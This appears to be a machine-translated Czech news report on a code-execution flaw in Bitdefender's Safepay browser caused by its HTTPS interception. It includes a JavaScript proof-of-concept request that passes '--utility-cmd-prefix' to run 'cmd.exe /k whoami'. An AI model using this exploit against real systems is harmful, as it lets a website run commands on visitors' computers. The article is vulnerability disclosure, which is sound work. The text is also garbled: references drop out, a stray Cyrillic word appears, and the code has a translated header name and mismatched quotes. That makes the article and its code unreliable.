Vladimír Palant, tvůrce Adblock Plus, () ve specializovaném webovém prohlížeči Safepay založeném na enginu Chromium, nabízeném jako součást antivirového balíčku Bitdefender Total Security 2020 a zaměřeném na zvýšení bezpečnosti práce uživatele v globální síti (např. je poskytována dodatečná izolace při přístupu k bankám a platební systémy). Tato chyba zabezpečení umožňuje webům otevřeným v prohlížeči spouštět libovolný kód na úrovni operačního systému.
Příčinou problému je, že antivirus Bitdefender provádí lokální odposlech HTTPS provozu tím, že nahradí původní TLS certifikát webu. Do systému klienta je nainstalován další kořenový certifikát, který umožňuje skrýt provoz používaného systému dopravní kontroly. Antivir se vklíní do chráněného provozu a do některých stránek vloží vlastní JavaScript kód pro implementaci funkce Safe Search a v případě problémů s certifikátem zabezpečeného připojení nahradí vrácenou chybovou stránku svou. Vzhledem k tomu, že nová chybová stránka je obsluhována jménem otevíraného serveru, ostatní stránky na tomto serveru mají plný přístup k obsahu vloženému Bitdefenderem.
Při otevírání webu kontrolovaného útočníkem může tento web odeslat požadavek XMLHttpRequest a předstírat problémy s certifikátem HTTPS, když odpovídá, což povede k návratu chybové stránky podvržené Bitdefenderem. Protože je chybová stránka otevřena v kontextu domény útočníka, může číst obsah podvržené stránky s parametry Bitdefenderu. Stránka poskytovaná Bitdefenderem také obsahuje klíč relace, který vám umožňuje používat interní API Bitdefender ke spuštění samostatné relace prohlížeče Safepay, specifikovat libovolné příznaky příkazového řádku a spouštět jakékoli systémové příkazy pomocí „--utility-cmd-prefix“ vlajka. Příklad exploitu (param1 a param2 jsou hodnoty získané z chybové stránky):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Typ-obsahu", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Připomeňme, že studie provedená v roce 2017 že 24 z 26 testovaných antivirových produktů, které kontrolují provoz HTTPS prostřednictvím falšování certifikátů, snížilo celkovou úroveň zabezpečení připojení HTTPS.
Pouze 11 z 26 produktů poskytovalo aktuální šifrovací sady. 5 systémů neověřilo certifikáty (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produkty Kaspersky Internet Security a Total Security byly předmětem útoku a produkty AVG, Bitdefender a Bullguard jsou napadeny и . Dr.Web Antivirus 11 vám umožňuje vrátit se zpět k nespolehlivým exportním šifrám (útok ).
Zdroj: opennet.ru